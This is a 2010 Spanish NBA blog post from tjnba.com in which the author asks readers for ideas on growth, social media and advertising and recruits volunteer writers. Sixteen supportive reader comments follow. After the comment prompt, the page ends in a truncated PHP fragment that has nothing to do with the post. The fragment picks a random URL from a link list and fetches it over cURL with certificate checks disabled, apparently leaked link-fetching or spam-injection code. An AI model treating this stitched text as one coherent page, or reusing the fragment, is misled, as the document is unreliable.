Hacia el infinito y más allá

02 de February de 2010 por txusma

En la vida hay momentos en que es bueno pararse a pensar. Dejar que el mundo siga sus pasos mientras nosotros reflexionamos sobre nuestra situación y sobre adonde nos llevan nuestros pasos. Cuando tjnba.com nació, lo hizo bajo unas circunstancias y unas situaciones determinadas y ahora, dos año y medio después, es posible que haya llegado nuestro momento de sentarnos a decidir qué queramos que sea tjnba.com en el futuro.

Hay que reconocer que el blog ha crecido día a día, sobretodo a partir de este año. Mensualmente se reciben más de 10.000 visitas y se ofrecen hasta 25.000 páginas. Hemos escrito más de 1.000 artículos y hemos recibido más de 6.000 comentarios (muchos gracias a Iverson). Creemos que no está nada mal pero, ¿es este nuestro techo?

Hay una cosa que no ha cambiado en todo este tiempo y es la intención de que el blog sea un espacio sumamente colaborativo. No concibimos el blog como nuestro coto privado o nuestro pedestal desde el cual iluminar a las masas. A nosotros lo que nos gusta es debatir y compartir opiniones con todo aquel que quiera hacerlo con nosotros. Siempre hemos pensado que cualquiera con un poco de voluntad es capaz de escribir y siempre hemos ofrecido el blog como espacio para que cualquiera con unas inquietudes parecidas a las nuestras pudiera utilizarlo.

Por eso queremos abusar de vosotros desde dos puntos de vista. Por un lado queremos vuestra opinión. Necesitamos vuestras ideas para llegar a más gente, para hacernos más visibles, para que la comunidad crezca. ¿Créeis que herramientas como Facebook o Twitter nos ayudarían? ¿Pensáis que dedicamos demasiado tiempo a algún tema pero que en cambio pasamos de puntillas por otros mucho más interesantes? ¿Qué es lo que más os gusta del blog? ¿Pondrías publicidad? (si es que se llega a encontrar a algun cliente, claro).

Y por el otro lado, el abuso supremo. Nos encantaría, y casi diríamos los 2 o 3 que escribimos con más regularidad, que necesitaríamos un poco de colaboración. La ardua tarea de encontrar una horita cada día para escribir las crónicas y los informes semanales supone que no podamos centrarnos en otros aspectos que podrían ser interesantes como los rumores, las noticias de la liga, la NCAA, la D-League (interesantísimo…), artículos sobre la historia de la NBA, humor, fantasy leagues… Por eso necesitaríamos encontrar algunas personas que se involucran en el proyecto simplemente al nivel de escribir articulos o de coordinar algunas secciones. No hace falta que se escriban artículos diarios (para eso ya estamos nosotros), simplemente que de vez en cuando, a parte de los Trivial (con los que creemos, nos lo pasamos todos muy bien) aparezca algun artículo que rompa un poco con la monotonía en la que cae a veces el blog.

Esperamos vuestras opiniones y cualquiera que llegue será bienvenida. Siempre nos han gustado los proyectos construídos entre todos y ya tenemos experiencia en construir algo con gente a la que, en principio, no se conocía. El resultado fue excelente. No dudamos de que el del blog también lo será.

Comenta

16 comentarios a esta entrada

  1. dsromero dice:
    #1

    Yo te voy a hablar desde mi experiencia en otros blogs, la semana pasada medio en broma medio en serio empezamos un blog a raíz de una conversación en un foro (foros acb para más seña); la verdad es que nos llega mucho tráfico desde la cuenta de facebook que se ha creado ; en 4 días de vida van 2400 visitas (yo aún no me lo creo) y creo que el que aparezca el link en foros, redes sociales o en otros blogs tiene toda la culpa de ello. Yo por ejemplo, cuando comento en otros blogs siempre relleno el campo Website para que si a alguien se le da por clicar.
    Lo de la publicidad como usuario no soy muy partidario, a no ser que tengas contratado un servidor dedicado y quieras pagarlo con esos ingresos, en ese caso lo veo normal.
    Yo os suelo leer desde el lector de feeds pero prometo intentar ser más colaborador y dar mi opinión con más comentarios.

    Un saludo!!

      Citar

  2. Noname dice:
    #2

    todo lo que sea no empeorar … Para mi la mejor pagina de nba, tanto en contenidos como en frecuencia de actualizacion (el triple de post tampoco estaria mal jeje).

    Yo deje de comentar para aprender un poco antes de meter la pata, y colaboracion tampoco es que pueda daros mucha. Pero me gusta el proyecto que llevais adelante y os ofrezco ayuda tecnica con la web en el caso de que la necesiteis.

    Seguir asi.

    Pd: Sergio de autor en mas post, aunuqe sea de curiosidades (rojorob tb tiene buen nivel)

      Citar

  3. sayim dice:
    #3

    Hola:

    Yo soy de los nuevos usuarios de este año. Descubri el blog por casualidad y actualmente entro todos los dias por lo menos una vez.

    La estructura del blog me parece perfecta, con los resumenes diarios y los informes semanales. Puede que sea mucho pedir, pero ¿por que no se hace el resumen de los partidos del domingo?

    Lo de la publicidad me parece bien, mientras no sea excesivo. Por mi experiencia creo que con 10.000 visitas mensuales (y el consecuente progreso en Google, madre de todas las batallas) no creo q os cueste encontrar algo de publicidad que ayude a sufragar gastos.

    Como recomendación, además de los resúmenes de los domingos, creo que el crecimiento deberia ir enfocado hacia mas reportajes historicos (por ejemplo los de los mejores de la historia de Deer, estupendos todos ellos…), de la actualidad en forma de rumores y traspasos, de debate o analisis y realizar algunos articulos de humor.

    Mis conocimientos de baloncesto no son muy importantes, de hecho solo jugue dos años y era muy malo. Solo sigo la NBA en directo cuando tengo tiempo, pero no me importaria en absoluto echaros una mano en lo que pueda.

    Un cordial saludo y no cambieis nunca.

      Citar

  4. PIRATA dice:
    #4

    Buenas a todos,

    Os descubrí leyendo los blogs de Daimiel y desde entonces os sigo con regularidad y desde este año diariamente y hasta diria que estoy pillado tanto del blog como evidentemente de la nba.
    Si mi mujer no me hecha este año de casa no me echará nunca.
    Como se ha dicho anteriormente la estructura es perfecta, leyendo como leo las opiniones cada dia hay gente de sobra que os podria hechar una mano Love Denise, Sergio, Rojojorb i más.
    Mi opinión respecto al Facebook y Twitter es que seguro que llegariáis a mucha más gente pero nosé si seria en detrimento del espíritu del blog.
    Por mi parte seguir así.
    Ánimos.
    Saludos a todos.

      Citar

  5. Toni dice:
    #5

    Coincido en todo con Pirata, teneis grandes posibles cronistas como Love Denise o Sergio que comentan asiduamente en el blog y con lo de facebook y twitter ampliaríais horizontes aunque es posible que se pierda la eséncia de blog pero no es mala idea porque ganaríais muchos lectores a pesar que mantener 2/3 portales diariamente (no dejeis el blog por favor) significaría más trabajo.
    Desde luego que aparte de ser el mejor blog de nba en castellano sois un claro ejemplo para posibles lectores que se atrevan a montar su propio chiringuito, sois unos jugones.

      Citar

  6. sergio dice:
    #6

    Pues sinceramente creo que debo demasiados momentos de conversacion y ocio a esta pagina como para aportar lo que estoy aportando… os hare llegar articulos sobre estadistica o historia en breves… lo prometo

      Citar

  7. CAMPO2 dice:
    #7

    hola a todos yo tambien conoci este blogg a partir del de Daimiel, es un blog muy bueno y fresco y n me importaria quese montase alguna liga fantastica, asi todos podriamos jugar a una de las cosas que mas nos gusta a todos, que es ser entrenador, general manager y presidente, vamos lo que hacia Jesus Gil.

      Citar

  8. David dice:
    #8

    Quizá el tema de otras plataformas sí que lo debería llevar alguno que no fuera “de vosotros”, porque ya bastante tenéis con hacer crónicas y tal.
    No sé cómo lo querríais enfocar, pero una mano se os puede echar en ese sentido.

      Citar

  9. Rafa dice:
    #9

    A mí me parecere un acierto la idea de incluir más artículos de rumores, historias de NBA, etc.

    Soy seguidor asiduo de varios deportes y comencé a interesarme más a fondo por el basket NBA a partir del fichaje de Gasol por LA. Llevo leyendo tjnba casi 2 años diariamente, y poco a poco he pasado de conocer solamente jugadores NBA españoles a conocer el resto de jugadores, equipos y entresijos de la NBA. Como aficionado de a pie, que poco a poco ha ido conociendo más curiosidades NBA, me encantaría leer este tipo de artículos en el blog.

    PD: Siento no ser un experto y no poder aportar con artículos, anécdotas, etc. Solo puedo ofrecer mis opiniones como joven seguidor NBA que soy.

      Citar

  10. rojorob dice:
    #10

    Uf, no sé, creo que no soy muy creativo. A mí el blog me gusta así, y como sabéis lo leo TODOS LOS DÍAS. Quizá sí que estaría bien alguna sección más de humor, curiosidades o partidos históricos. Lo de facebook me parece un poco arriesgado, miedo a intrusos con ganas de bulla y que se convierta en la página de comentarios de marca (ya pasó en el blog de Daimiel hace tiempo, aunque ahora se ha arreglado). No sé, en cualquier caso enhorabuena y adelante con lo que decidáis.

      Citar

  11. M dice:
    #11

    Lo de Facebook y la publicidad me parece bien, y lo de la ayuda, pues estaré encantado de prestarla, si puedo, pero advierto que no conozco tanto como vosotros, bueno, en mi blog hice un análisis medio humorístico de la temporada, que estaba basado en el vuestro (sin llegar al plagio), pero si se puede haer algo, lo intentaría. No sé ni como os descubrí, supongo que en una búsqueda de NBA y desde entonces os leo siempre, la verdad es que haceís un trabajo enorme, muchas gracias.

      Citar

  12. TheDeerHunter dice:
    #12

    Gracias a vosotros por vuestras muestras de apoyo (y por aguantarnos todos los días, qué diantre)

    También gracias por vuestras sugerencias que, tendremos mucho en cuenta.

    En cuanto al tema de participación, artículos y demás, si queréis libremente ofrecernos vuestra disponibilidad es fundamental que os pongáis en contacto con Txuma (txusma@tjnba.com) para que podamos coordinar los esfuerzos.

    NECESITAMOS JUGONES. Muchos son los llamados…

      Citar

  13. Love Denise dice:
    #13

    A mi no me importaria escribir alguna cronica de vez en cuando, pero tengo dos problemas.
    1- no se por qué medio publicais las crónicas, hay que instalar algun software en el pc para ello? o es escribirla simplemente como cuando yo escribo un comentario?, lo digo porque la mayoria de las veces yo escribo en un pc que no es mio, por lo que si hay que instalar algo, no podria.
    2- en caso de escribir y publicar las cronicas, tendria que ser a partir de las 5-6 de la tarde, no obstante intentare ayudar lo maximo posible.

    Asi que vosotros escribiais en el blog de Daimiel, yo lo leia frecuentemente aunque nunca participé, recuerdo que unos cuantos de los que escribian creo una radio o algo así para un pueblo (no sé si sereis vosotros) y entre ellos siempre habia uno insultando y haciendo polemicos comentarios, y yo lo deje de leer porque aquello derivo en un Salvame, un cruce de insultos y poco baloncesto, y Daimiel no actualizaba mucho, y desd entonces no volvi a entrar, ya no se si ete blog esta mejor ya o no.

      Citar

  14. Txusma dice:
    #14

    Recuerdo a los de la radio. De hecho yo llegué creo q a la vez q estallaron los problemas. Después los de la radio ya no aparecieron más y ahora las aguas han vuelto a su cauce. Lo q pasa es que me doy cuenta del problema que tienen los blogs de gente famosa y es q es complicado q haya un dialogo entre el resto de participantes. Normalmente lo q hacen los usuarios es simplemente comentar el articulo en si (y pocas veces llevando la contraria) pero no se yo si se leen el resto de comentarios por lo que no hay casi debate.

      Citar

  15. kantonyo dice:
    #15

    No sé si habeis visto la posibilidad de dar de alta el blog en Google News http://www.google.es/support/news_pub/bin/answer.py?hl=es&answer=40787
    Puede ser interesante…

      Citar

  16. Scriers dice:
    #16

    Para mí, el sitio de referencia de NBA en cuestión de análisis en España a nivel de aficionado-enfermizo. Un estilo directo, objetivo y que se moja. Un clásico ya de mi navegación y uno de los sitios más divertidos.

    Chapeau!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>